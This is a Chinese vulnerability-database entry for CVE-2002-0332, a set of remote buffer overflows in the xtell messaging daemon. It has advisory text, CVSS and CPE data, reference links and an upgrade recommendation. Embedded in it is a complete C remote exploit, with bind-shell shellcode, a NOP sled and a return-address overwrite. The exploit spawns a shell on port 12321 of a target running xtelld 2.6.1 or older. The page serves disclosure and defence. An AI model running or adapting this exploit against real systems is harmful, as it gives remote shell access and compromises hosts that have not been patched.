CVE-2002-0332
CVSS7.5
发布时间 :2002-06-25 00:00:00
修订时间 :2016-10-17 22:19:20
NMCOES    

[原文]Buffer overflows in xtell (xtelld) 1.91.1 and earlier, and 2.x before 2.7, allows remote attackers to execute arbitrary code via (1) a long DNS hostname that is determined using reverse DNS lookups, (2) a long AUTH string, or (3) certain data in the xtell request.


[CNNVD]xtell多个远程缓冲区溢出漏洞(CNNVD-200206-089)

        xtell (xtelld) 1.91.1版本及之前版本,以及2.x 2.7之前版本存在缓冲区溢出漏洞。远程攻击者可以借助(1)通过使用反向DNS查找确定的超长DNS主机名,(2)超长AUTH字符串,或者(3)xtell请求中的某个数据来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:xtell:xtell:1.91.1
cpe:/a:xtell:xtell:2.6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0332
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0332
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-089
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101494896516467&w=2
(UNKNOWN)  BUGTRAQ  20020227 Remote exploit against xtelld and other fun
http://www.debian.org/security/2002/dsa-121
(VENDOR_ADVISORY)  DEBIAN  DSA-121
http://www.iss.net/security_center/static/8312.php
(UNKNOWN)  XF  xtell-bo(8312)
http://www.securityfocus.com/bid/4193
(UNKNOWN)  BID  4193

- 漏洞信息

xtell多个远程缓冲区溢出漏洞
高危 缓冲区溢出
2002-06-25 00:00:00 2005-10-20 00:00:00
远程  
        xtell (xtelld) 1.91.1版本及之前版本,以及2.x 2.7之前版本存在缓冲区溢出漏洞。远程攻击者可以借助(1)通过使用反向DNS查找确定的超长DNS主机名,(2)超长AUTH字符串,或者(3)xtell请求中的某个数据来执行任意代码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .
        xtell xtell 1.91.1
        

- 漏洞信息 (21309)

xtell 1.91.1/2.6.1 Multiple Remote Buffer Overflow Vulnerabilities (EDBID:21309)
linux remote
2002-02-27 Verified
0 spybreak
N/A [点击下载]
source: http://www.securityfocus.com/bid/4193/info

xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems.

Multiple buffer overflow vulnerabilities have been reported in some versions of xtell. If long strings are recieved by the xtell client, stack memory will be overwritten. Exploitation of these vulnerabilities may result in arbitrary code being executed as the xtell daemon.

Overflow conditions may be caused if long strings are sent by a malicious DNS server in response to the reverse lookup performed when a message is received, either through the auth string returned by the ident server, or through directly sending an overly long message to the vulnerable user.

Earlier versions of xtell may share some or all of these vulnerabilities. This has not been confirmed.

cat >xtelld261.c <<EOF

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>

/*
 *      Remote exploit for Xtelld 2.6.1 and older
 *      Spawns shell on port 12321
 *      Don't forget to set your identd string to 200 characters
 *      Tested against Red Hat 7.2, 7.1; Debian Potato
 *      (c) 2002 Spybreak (spybreak@host.sk)
 */

#define RET     0xbffff5a0

char sc[] =
  "\x55\x89\xe5\x31\xc0\x66\xc7\x45\xf2\x30"
  "\x21\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc"
  "\x89\x45\xe8\xfe\xc0\x89\xc3\x89\x45\xe4"
  "\xfe\xc0\x66\x89\x45\xf0\x89\x45\xe0\xb0"
  "\x66\x8d\x4d\xe0\xcd\x80\x89\x45\xe0\xb0"
  "\x66\xfe\xc3\x8d\x55\xf0\x89\x55\xe4\x31"
  "\xd2\xb2\x42\x80\xea\x32\x89\x55\xe8\x8d"
  "\x4d\xe0\xcd\x80\xb0\x66\xfe\xc3\xfe\xc3"
  "\xfe\xc3\x89\x5d\xe4\xfe\xcb\x8d\x4d\xe0"
  "\xcd\x80\xb0\x66\xfe\xc3\x31\xd2\x89\x55"
  "\xe4\x8d\x4d\xe0\xcd\x80\x89\xd9\x89\xc3"
  "\xfe\xc9\xfe\xc9\xfe\xc9\x31\xc0\xb0\x3f"
  "\xcd\x80\xfe\xc1\xe2\xf4\x51\x68\x6e\x2f"
  "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
  "\x89\xe2\x53\x89\xe1\x31\xc0\xb0\x3d\x2c"
  "\x32\xcd\x80";

void
usage (char *exp)
{
  fprintf (stderr, "Remote exploit for xtelld 2.6.1 and older.\n"
           "Spawns shell on port 12321.\n"
           "-- (c) 2002/2 Spybreak --\n"
           "Usage: %s [options] target\n", exp);
  fprintf (stderr, "Options: -a alignment (default 0)\n"
           "         -o offset (default 0)\n"
           "         -p port (default 4224)\n");
  exit (-1);
}

int
main (int argc, char **argv)
{

  int c, s, i, size, port = 4224;
  int ret = RET, alignment = 0;
  struct sockaddr_in target;
  struct hostent *host;
  char payload[1078];

  opterr = 0;

  while ((c = getopt (argc, argv, "a:o:p:")) != -1)
    switch (c)
      {
      case 'a':
        alignment = atoi (optarg);
        break;
      case 'o':
        ret += atoi (optarg);
        break;
      case 'p':
        port = atoi (optarg);
        break;
      default:
        usage (argv[0]);
        exit (1);
      }

  if (!argv[optind])
    {
      puts ("no target!");
      usage (argv[0]);
    }


  printf ("Using: TARGET: %s\tPORT: %d\tADDR: %x\t ALIGN: %d\n",
          argv[optind], port, ret, alignment);

  for (i = 0; i < 540; i++)
    payload[i] = 0x90;

  for (i = 540; i <= 1072; i += 4)
    *((int *) (payload + i)) = ret;


  memcpy (payload + 540, sc, sizeof (sc) - 1);
  memcpy (payload, "01234567890123456789::null:;-)", 30);
  payload[1077 + alignment] = '\n';

  host = gethostbyname (argv[1]);
  if (host == NULL)
    {
      perror ("gethostbyname");
      return (-1);
    }

  s = socket (AF_INET, SOCK_STREAM, 0);
  if (s < 0)
    {
      perror ("socket");
      return (-1);
    }

  target.sin_family = AF_INET;
  target.sin_addr = *((struct in_addr *) host->h_addr);
  target.sin_port = htons (port);

  if (connect (s, (struct sockaddr *) &target, sizeof (target)) == -1)
    {
      perror ("connect");
      close (s);
      return (-1);
    }

  size = send (s, payload + alignment, 1078, 0);
  if (size == -1)
    {
      perror ("send");
      close (s);
      return (-1);
    }

  close (s);
  return (0);
}

EOF

		

- 漏洞信息

5836
Xtell Crafted DNS Name String Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in Xtell. The Xtelld daemon fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution with the UID of the Xtell daemon resulting in a loss of integrity.

- 时间线

2002-02-27 Unknow
2002-02-27 Unknow

- 解决方案

Upgrade to version 2.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

xtell Multiple Remote Buffer Overflow Vulnerabilities
Boundary Condition Error 4193
Yes No
2002-02-27 12:00:00 2009-07-11 10:56:00
Discovered by "Spybreak" <spybreak@host.sk>.

- 受影响的程序版本

xtell xtell 2.6.1
xtell xtell 1.91.1
+ Debian Linux 2.2

- 漏洞讨论

xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems.

Multiple buffer overflow vulnerabilities have been reported in some versions of xtell. If long strings are recieved by the xtell client, stack memory will be overwritten. Exploitation of these vulnerabilities may result in arbitrary code being executed as the xtell daemon.

Overflow conditions may be caused if long strings are sent by a malicious DNS server in response to the reverse lookup performed when a message is received, either through the auth string returned by the ident server, or through directly sending an overly long message to the vulnerable user.

Earlier versions of xtell may share some or all of these vulnerabilities. This has not been confirmed.

- 漏洞利用

An exploit has been provided by Spybreak &lt;spybreak@host.sk&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


xtell xtell 1.91.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站